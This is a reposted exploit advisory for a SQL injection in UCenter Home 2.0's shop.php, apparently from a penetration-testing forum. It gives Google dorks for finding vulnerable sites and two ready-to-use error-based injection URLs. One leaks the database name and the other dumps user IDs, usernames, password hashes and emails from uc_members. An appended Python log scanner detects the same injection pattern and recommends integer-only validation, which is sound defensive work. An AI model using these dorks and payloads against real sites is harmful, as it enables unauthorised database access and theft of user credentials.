China Network Penetration Testing Alliance
Title: UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability
Author: admin
Time: 2013-2-27 21:31
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerability type : SQL Injection (MySQL Error Based)
Needed materials : Hex conversion
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
You need the victim's database name.
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
..
DB : Okay.
Edit the DB name : `[TARGET DB NAME]`
Example : 'hiwir1_ucenter'
Edit : Okay.
Use hex conversion and edit your SQL injection exploit.
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
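
A defender-side check for this request pattern, as an added example that is not part of the original advisory: it scans web access logs for shop.php requests whose shopid is not a plain integer or carries the error-based markers seen in the payload above. The log lines, IP addresses and function names are constructed for illustration, and treating valid shopid values as plain integers is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Markers of the MySQL error-based technique visible in the advisory's payload.
MARKERS = {
    "rand_floor": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "information_schema": re.compile(r"information_schema", re.I),
    "group_by": re.compile(r"group\s+by", re.I),
    "concat": re.compile(r"concat\s*\(", re.I),
}
# Request field of a combined-format access log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log (documentation IP ranges, shortened marker-only payload).
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Feb/2013:21:00:01 +0800] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '198.51.100.23 - - [27/Feb/2013:21:00:05 +0800] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from(select%20count(*),concat(0x7e,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 812',
    '203.0.113.7 - - [27/Feb/2013:21:00:09 +0800] "GET /shop.php?ac=view&shopid=12abc HTTP/1.1" 200 640',
    '192.0.2.10 - - [27/Feb/2013:21:00:12 +0800] "GET /index.php?shopid=x HTTP/1.1" 200 300',
]


def inspect_shopid(target):
    """Return findings for one request target; an empty list means clean."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/shop.php"):
        return []
    # parse_qs percent-decodes the value, so encoded payloads are matched too.
    query = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    for value in query.get("shopid", []):
        # Assumption: a legitimate shopid is a short run of ASCII digits.
        if not re.fullmatch(r"[0-9]{1,10}", value):
            findings.append("non_numeric_shopid")
        findings += [name for name, rx in MARKERS.items() if rx.search(value)]
    return findings


def scan(lines):
    """Yield (line_number, client_ip, findings) for each suspicious log line."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        findings = inspect_shopid(match.group(1))
        if findings:
            yield number, line.split(" ", 1)[0], findings
```

The same integer-only rule, applied to shopid before it reaches the query, is what closes this class of bug; the scan only surfaces requests that violated it.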